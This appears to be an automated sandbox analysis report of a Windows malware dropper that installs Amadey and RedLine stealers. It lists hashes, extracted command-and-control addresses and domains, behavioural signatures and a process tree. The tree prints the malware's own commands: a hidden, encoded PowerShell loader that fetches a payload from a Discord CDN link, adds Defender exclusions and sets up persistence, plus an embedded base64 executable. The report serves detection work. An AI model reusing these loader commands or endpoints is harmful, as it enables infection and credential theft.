Analysis
-
max time kernel
141s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2022 15:31
Static task
static1
Behavioral task
behavioral1
Sample
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Resource
win10v2004-20220812-en
General
-
Target
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
-
Size
332KB
-
MD5
31d0310cd3d6d5e2e7c51508c12b25dd
-
SHA1
c19664c55ede5d5411d348fae4832823b7085086
-
SHA256
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
-
SHA512
2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
SSDEEP
6144:2nthmabx7r/ALqcu8pPP0uJLnJ0Lf02sge2U:2ntYabx7kZdP0uJLnJWfPmd
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1015613582383259758/1018992777566097538/error.log.1
Extracted
amadey
3.50
62.204.41.6/p9cWxH/index.php
Extracted
redline
Wish
31.41.244.14:4694
-
auth_value
836b5b05c28f01127949ef1e84b93e92
Extracted
amadey
3.10
hellomr.observer/f8dfksdj3/index.php
researchersgokick.rocks/f8dfksdj3/index.php
pleasetake.pictures/f8dfksdj3/index.php
Signatures
-
Detect Amadey credential stealer module 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll amadey_cred_module behavioral1/memory/3724-154-0x0000000000A90000-0x0000000000AB4000-memory.dmp amadey_cred_module C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll amadey_cred_module C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll amadey_cred_module -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exepowershell.exepowershell.exeflow pid process 41 3724 rundll32.exe 66 4356 powershell.exe 74 732 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
gntuud.exegntuud.exelinda5.exewish.exebuild333333.exeUSBtoISOConverter.exegntuud.exeUpdate.exeorxds.exepid process 1220 gntuud.exe 228 gntuud.exe 3680 linda5.exe 1244 wish.exe 3684 build333333.exe 4548 USBtoISOConverter.exe 752 gntuud.exe 2192 Update.exe 2600 orxds.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exegntuud.exelinda5.exeUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation gntuud.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation linda5.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Update.exe -
Loads dropped DLL 5 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 3724 rundll32.exe 3724 rundll32.exe 2908 rundll32.exe 792 rundll32.exe 792 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
gntuud.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build333333.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000013001\\build333333.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\USBtoISOConverter.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000019001\\USBtoISOConverter.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000011001\\linda5.exe" gntuud.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3564 4808 WerFault.exe 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe 3468 228 WerFault.exe gntuud.exe 3892 752 WerFault.exe gntuud.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2616 schtasks.exe 3852 schtasks.exe -
Modifies registry class 1 IoCs
Processes:
linda5.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings linda5.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
rundll32.exewish.exepowershell.exepowershell.exepowershell.exepid process 3724 rundll32.exe 3724 rundll32.exe 3724 rundll32.exe 3724 rundll32.exe 1244 wish.exe 4356 powershell.exe 4356 powershell.exe 1244 wish.exe 732 powershell.exe 732 powershell.exe 1268 powershell.exe 1268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 3368 wmic.exe Token: SeSecurityPrivilege 3368 wmic.exe Token: SeTakeOwnershipPrivilege 3368 wmic.exe Token: SeLoadDriverPrivilege 3368 wmic.exe Token: SeSystemProfilePrivilege 3368 wmic.exe Token: SeSystemtimePrivilege 3368 wmic.exe Token: SeProfSingleProcessPrivilege 3368 wmic.exe Token: SeIncBasePriorityPrivilege 3368 wmic.exe Token: SeCreatePagefilePrivilege 3368 wmic.exe Token: SeBackupPrivilege 3368 wmic.exe Token: SeRestorePrivilege 3368 wmic.exe Token: SeShutdownPrivilege 3368 wmic.exe Token: SeDebugPrivilege 3368 wmic.exe Token: SeSystemEnvironmentPrivilege 3368 wmic.exe Token: SeRemoteShutdownPrivilege 3368 wmic.exe Token: SeUndockPrivilege 3368 wmic.exe Token: SeManageVolumePrivilege 3368 wmic.exe Token: 33 3368 wmic.exe Token: 34 3368 wmic.exe Token: 35 3368 wmic.exe Token: 36 3368 wmic.exe Token: SeIncreaseQuotaPrivilege 3368 wmic.exe Token: SeSecurityPrivilege 3368 wmic.exe Token: SeTakeOwnershipPrivilege 3368 wmic.exe Token: SeLoadDriverPrivilege 3368 wmic.exe Token: SeSystemProfilePrivilege 3368 wmic.exe Token: SeSystemtimePrivilege 3368 wmic.exe Token: SeProfSingleProcessPrivilege 3368 wmic.exe Token: SeIncBasePriorityPrivilege 3368 wmic.exe Token: SeCreatePagefilePrivilege 3368 wmic.exe Token: SeBackupPrivilege 3368 wmic.exe Token: SeRestorePrivilege 3368 wmic.exe Token: SeShutdownPrivilege 3368 wmic.exe Token: SeDebugPrivilege 3368 wmic.exe Token: SeSystemEnvironmentPrivilege 3368 wmic.exe Token: SeRemoteShutdownPrivilege 3368 wmic.exe Token: SeUndockPrivilege 3368 wmic.exe Token: SeManageVolumePrivilege 3368 wmic.exe Token: 33 3368 wmic.exe Token: 34 3368 wmic.exe Token: 35 3368 wmic.exe Token: 36 3368 wmic.exe Token: SeIncreaseQuotaPrivilege 4576 WMIC.exe Token: SeSecurityPrivilege 4576 WMIC.exe Token: SeTakeOwnershipPrivilege 4576 WMIC.exe Token: SeLoadDriverPrivilege 4576 WMIC.exe Token: SeSystemProfilePrivilege 4576 WMIC.exe Token: SeSystemtimePrivilege 4576 WMIC.exe Token: SeProfSingleProcessPrivilege 4576 WMIC.exe Token: SeIncBasePriorityPrivilege 4576 WMIC.exe Token: SeCreatePagefilePrivilege 4576 WMIC.exe Token: SeBackupPrivilege 4576 WMIC.exe Token: SeRestorePrivilege 4576 WMIC.exe Token: SeShutdownPrivilege 4576 WMIC.exe Token: SeDebugPrivilege 4576 WMIC.exe Token: SeSystemEnvironmentPrivilege 4576 WMIC.exe Token: SeRemoteShutdownPrivilege 4576 WMIC.exe Token: SeUndockPrivilege 4576 WMIC.exe Token: SeManageVolumePrivilege 4576 WMIC.exe Token: 33 4576 WMIC.exe Token: 34 4576 WMIC.exe Token: 35 4576 WMIC.exe Token: 36 4576 WMIC.exe Token: SeIncreaseQuotaPrivilege 4576 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exegntuud.exelinda5.execontrol.exebuild333333.execmd.execmd.exerundll32.exeRunDll32.exeUSBtoISOConverter.execmd.exepowershell.execmd.execmd.exepowershell.exedescription pid process target process PID 4808 wrote to memory of 1220 4808 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe gntuud.exe PID 4808 wrote to memory of 1220 4808 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe gntuud.exe PID 4808 wrote to memory of 1220 4808 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe gntuud.exe PID 1220 wrote to memory of 2616 1220 gntuud.exe schtasks.exe PID 1220 wrote to memory of 2616 1220 gntuud.exe schtasks.exe PID 1220 wrote to memory of 2616 1220 gntuud.exe schtasks.exe PID 1220 wrote to memory of 3680 1220 gntuud.exe linda5.exe PID 1220 wrote to memory of 3680 1220 gntuud.exe linda5.exe PID 1220 wrote to memory of 3680 1220 gntuud.exe linda5.exe PID 3680 wrote to memory of 3700 3680 linda5.exe control.exe PID 3680 wrote to memory of 3700 3680 linda5.exe control.exe PID 3680 wrote to memory of 3700 3680 linda5.exe control.exe PID 1220 wrote to memory of 3724 1220 gntuud.exe rundll32.exe PID 1220 wrote to memory of 3724 1220 gntuud.exe rundll32.exe PID 1220 wrote to memory of 3724 1220 gntuud.exe rundll32.exe PID 1220 wrote to memory of 1244 1220 gntuud.exe wish.exe PID 1220 wrote to memory of 1244 1220 gntuud.exe wish.exe PID 1220 wrote to memory of 1244 1220 gntuud.exe wish.exe PID 3700 wrote to memory of 2908 3700 control.exe rundll32.exe PID 3700 wrote to memory of 2908 3700 control.exe rundll32.exe PID 3700 wrote to memory of 2908 3700 control.exe rundll32.exe PID 1220 wrote to memory of 3684 1220 gntuud.exe build333333.exe PID 1220 wrote to memory of 3684 1220 gntuud.exe build333333.exe PID 1220 wrote to memory of 3684 1220 gntuud.exe build333333.exe PID 3684 wrote to memory of 3368 3684 build333333.exe wmic.exe PID 3684 wrote to memory of 3368 3684 build333333.exe wmic.exe PID 3684 wrote to memory of 3368 3684 build333333.exe wmic.exe PID 3684 wrote to memory of 1272 3684 build333333.exe cmd.exe PID 3684 wrote to memory of 1272 3684 build333333.exe cmd.exe PID 3684 wrote to memory of 1272 3684 build333333.exe cmd.exe PID 1272 wrote to memory of 4576 1272 cmd.exe WMIC.exe PID 1272 wrote to memory of 4576 1272 cmd.exe WMIC.exe PID 1272 wrote to memory of 4576 1272 cmd.exe WMIC.exe PID 1220 wrote to memory of 4548 1220 gntuud.exe USBtoISOConverter.exe PID 1220 wrote to memory of 4548 1220 gntuud.exe USBtoISOConverter.exe PID 3684 wrote to memory of 4388 3684 build333333.exe cmd.exe PID 3684 wrote to memory of 4388 3684 build333333.exe cmd.exe PID 3684 wrote to memory of 4388 3684 build333333.exe cmd.exe PID 4388 wrote to memory of 1508 4388 cmd.exe WMIC.exe PID 4388 wrote to memory of 1508 4388 cmd.exe WMIC.exe PID 4388 wrote to memory of 1508 4388 cmd.exe WMIC.exe PID 2908 wrote to memory of 5048 2908 rundll32.exe RunDll32.exe PID 2908 wrote to memory of 5048 2908 rundll32.exe RunDll32.exe PID 5048 wrote to memory of 792 5048 RunDll32.exe rundll32.exe PID 5048 wrote to memory of 792 5048 RunDll32.exe rundll32.exe PID 5048 wrote to memory of 792 5048 RunDll32.exe rundll32.exe PID 4548 wrote to memory of 4200 4548 USBtoISOConverter.exe cmd.exe PID 4548 wrote to memory of 4200 4548 USBtoISOConverter.exe cmd.exe PID 4200 wrote to memory of 4356 4200 cmd.exe powershell.exe PID 4200 wrote to memory of 4356 4200 cmd.exe powershell.exe PID 4356 wrote to memory of 3852 4356 powershell.exe schtasks.exe PID 4356 wrote to memory of 3852 4356 powershell.exe schtasks.exe PID 4548 wrote to memory of 5040 4548 USBtoISOConverter.exe cmd.exe PID 4548 wrote to memory of 5040 4548 USBtoISOConverter.exe cmd.exe PID 5040 wrote to memory of 732 5040 cmd.exe powershell.exe PID 5040 wrote to memory of 732 5040 cmd.exe powershell.exe PID 4548 wrote to memory of 2032 4548 USBtoISOConverter.exe cmd.exe PID 4548 wrote to memory of 2032 4548 USBtoISOConverter.exe cmd.exe PID 2032 wrote to memory of 1268 2032 cmd.exe powershell.exe PID 2032 wrote to memory of 1268 2032 cmd.exe powershell.exe PID 1268 wrote to memory of 2192 1268 powershell.exe Update.exe PID 1268 wrote to memory of 2192 1268 powershell.exe Update.exe PID 1268 wrote to memory of 2192 1268 powershell.exe Update.exe PID 4548 wrote to memory of 2044 4548 USBtoISOConverter.exe cmd.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe"C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe"C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe"C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C "wmic cpu get name"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get name5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADEANQA2ADEAMwA1ADgAMgAzADgAMwAyADUAOQA3ADUAOAAvADEAMAAxADgAOQA5ADIANQA1ADYAMAA4ADUAOAA3ADAANQA5ADIALwBjAGMAYwAnACAALQBPAHUAdABmAGkAbABlACAAJABkADsAJABkAGEAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABkADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACIAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAIABTAGMAaABlAGQAdQBsAGUAZAAgAFUAcABkAGEAdABlACIAIAAvAHIAbAAgAEgASQBHAEgARQBTAFQAIAAvAHQAcgAgACIAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADEANQA2ADEAMwA1ADgAMgAzADgAMwAyADUAOQA3ADUAOAAvADEAMAAxADgAOQA5ADIANQA1ADYAMAA4ADUAOAA3ADAANQA5ADIALwBjAGMAYwAnACAALQBPAHUAdABmAGkAbABlACAAJABkADsAJABkAGEAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABkADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACIAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAIABTAGMAaABlAGQAdQBsAGUAZAAgAFUAcABkAGEAdABlACIAIAAvAHIAbAAgAEgASQBHAEgARQBTAFQAIAAvAHQAcgAgACIAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Windows Scheduled Update" /rl HIGHEST /tr C:\\ProgramData\Update.exe6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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bWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFJlc2l6ZQBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBIZWxwZXIuZGxsAFN5c3RlbQBmbgBTeXN0ZW0uUmVmbGVjdGlvbgBIZWxwZXIALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAHJvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSZWFkQWxsQnl0ZXMAV3JpdGVBbGxCeXRlcwBHZXRCeXRlcwBieXRlcwBGb3JtYXQAT2JqZWN0AENvbnZlcnQAU3lzdGVtLlRleHQAQXJyYXkAa2V5AExpYnJhcnkARW1wdHkAAAAAANgSYNXASRJBgn6FJp2AZgkABCABAQgDIAABBSABARERBCABAQ4EIAEBAgQHAR0FBQABHQUOBhABAB0eAAMKARwGAAIODh0cBAAAElEFIAEdBQ4EAAEIDgYAAgEOHQUEAAEBDgQHAgoKCRABAgEQHR4ACAMKAQUIt3pcVhk04IkEAAAAAAcABAEODg4OCgADHQUQHQUdBQkIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAAFAEAD1Rlc3RDb25zb2xlQXBwMQAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAyMgAAKQEAJDM1QTg1QjRGLTI1MzUtNDJCMi1BODY4LUQ0RkIyQTA4N0ZDNAAADAEABzEuMC4wLjAAAE0BABwuTkVURnJhbWV3b3JrLFZlcnNpb249djQuNy4yA